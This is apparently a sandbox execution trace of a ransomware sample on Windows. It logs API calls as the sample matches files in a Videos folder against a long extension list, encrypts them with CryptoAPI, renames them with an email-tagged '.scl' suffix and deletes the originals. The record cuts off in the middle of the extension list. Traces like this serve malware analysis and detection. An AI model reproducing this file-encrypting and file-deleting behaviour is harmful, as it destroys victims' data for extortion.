	[0201.448] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf")) returned 1
	[0201.454] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf")) returned 0
	[0201.455] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5e51800, ftCreationTime.dwHighDateTime=0x1d96657, ftLastAccessTime.dwLowDateTime=0xdf045570, ftLastAccessTime.dwHighDateTime=0x1d96dbd, ftLastWriteTime.dwLowDateTime=0xdf045570, ftLastWriteTime.dwHighDateTime=0x1d96dbd, nFileSizeHigh=0x0, nFileSizeLow=0x9331, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="cL1o0YRs a.swf", cAlternateFileName="CL1O0Y~1.SWF")) returned 1
	[0201.455] lstrcmpW (lpString1="cL1o0YRs a.swf", lpString2="..") returned 1
	[0201.455] lstrcmpW (lpString1="cL1o0YRs a.swf", lpString2=".") returned 1
	[0201.455] lstrcpyW (in: lpString1=0x187ca4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\"
	[0201.455] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\", lpString2="cL1o0YRs a.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\cL1o0YRs a.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\cL1o0YRs a.swf"
	[0201.455] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\cL1o0YRs a.swf") returned 134
	[0201.456] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.456] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\cL1o0YRs a.swf", cchLength=0x86 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf") returned 0x86
	[0201.456] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.456] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.456] lstrcpyW (in: lpString1=0x18784c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf"
	[0201.456] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf") returned 134
	[0201.456] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.457] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0201.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.457] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0201.457] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.458] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.458] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b0
	[0201.461] ReadFile (in: hFile=0x3b0, lpBuffer=0xfe21a8, nNumberOfBytesToRead=0x9331, lpNumberOfBytesRead=0x187200, lpOverlapped=0x0 | out: lpBuffer=0xfe21a8*, lpNumberOfBytesRead=0x187200*=0x9331, lpOverlapped=0x0) returned 1
	[0201.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.464] CryptAcquireContextW (in: phProv=0x186db0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x186db0*=0xfcb3b8) returned 1
	[0201.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.466] CryptCreateHash (in: hProv=0xfcb3b8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x186db4 | out: phHash=0x186db4) returned 1
	[0201.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.466] CryptHashData (hHash=0xfb93b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0201.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.467] CryptDeriveKey (in: hProv=0xfcb3b8, Algid=0x6610, hBaseData=0xfb93b0, dwFlags=0x1, phKey=0x186db8 | out: phKey=0x186db8*=0xfb91b0) returned 1
	[0201.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.467] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x186dcc*=0x9331, dwBufLen=0x9331 | out: pbData=0x0*, pdwDataLen=0x186dcc*=0x9340) returned 1
	[0201.468] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.468] RtlMoveMemory (in: Destination=0xfeb4e8, Source=0xfe21a8, Length=0x9331 | out: Destination=0xfeb4e8) 
	[0201.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.468] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfeb4e8*, pdwDataLen=0x186dac*=0x9331, dwBufLen=0x9340 | out: pbData=0xfeb4e8*, pdwDataLen=0x186dac*=0x9340) returned 1
	[0201.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.469] CryptDestroyKey (hKey=0xfb91b0) returned 1
	[0201.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.469] CryptDestroyHash (hHash=0xfb93b0) returned 1
	[0201.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.469] CryptReleaseContext (hProv=0xfcb3b8, dwFlags=0x0) returned 1
	[0201.469] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.470] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x186dc8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x186dc8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.472] GetUserNameA (in: lpBuffer=0x186cac, pcbBuffer=0x186dc4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x186dc4) returned 1
	[0201.473] wsprintfW (in: param_1=0x186de0, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 176
	[0201.473] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b4
	[0201.473] WriteFile (in: hFile=0x3b4, lpBuffer=0xfeb4e8*, nNumberOfBytesToWrite=0x9340, lpNumberOfBytesWritten=0x187208, lpOverlapped=0x0 | out: lpBuffer=0xfeb4e8*, lpNumberOfBytesWritten=0x187208*=0x9340, lpOverlapped=0x0) returned 1
	[0201.477] CloseHandle (hObject=0x3b4) returned 1
	[0201.478] CloseHandle (hObject=0x3b0) returned 1
	[0201.478] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf")) returned 1
	[0201.484] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\cl1o0yrs a.swf")) returned 0
	[0201.484] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x869921c0, ftCreationTime.dwHighDateTime=0x1d971a7, ftLastAccessTime.dwLowDateTime=0xd654b460, ftLastAccessTime.dwHighDateTime=0x1d972db, ftLastWriteTime.dwLowDateTime=0xd654b460, ftLastWriteTime.dwHighDateTime=0x1d972db, nFileSizeHigh=0x0, nFileSizeLow=0x2b83, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="ij1_ g0KO.avi", cAlternateFileName="IJ1_G0~1.AVI")) returned 1
	[0201.484] lstrcmpW (lpString1="ij1_ g0KO.avi", lpString2="..") returned 1
	[0201.484] lstrcmpW (lpString1="ij1_ g0KO.avi", lpString2=".") returned 1
	[0201.484] lstrcpyW (in: lpString1=0x187ca4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\"
	[0201.484] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\", lpString2="ij1_ g0KO.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\ij1_ g0KO.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\ij1_ g0KO.avi"
	[0201.484] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\ij1_ g0KO.avi") returned 133
	[0201.484] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.485] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\ij1_ g0KO.avi", cchLength=0x85 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\ij1_ g0ko.avi") returned 0x85
	[0201.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.485] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\ij1_ g0ko.avi", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.485] lstrcpyW (in: lpString1=0x18784c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\ij1_ g0ko.avi" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\ij1_ g0ko.avi") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\ij1_ g0ko.avi"
	[0201.485] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\ij1_ g0ko.avi") returned 133
	[0201.485] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.487] StrStrW (lpFirst=".avi", lpSrch=".") returned=".avi"
	[0201.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.487] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.a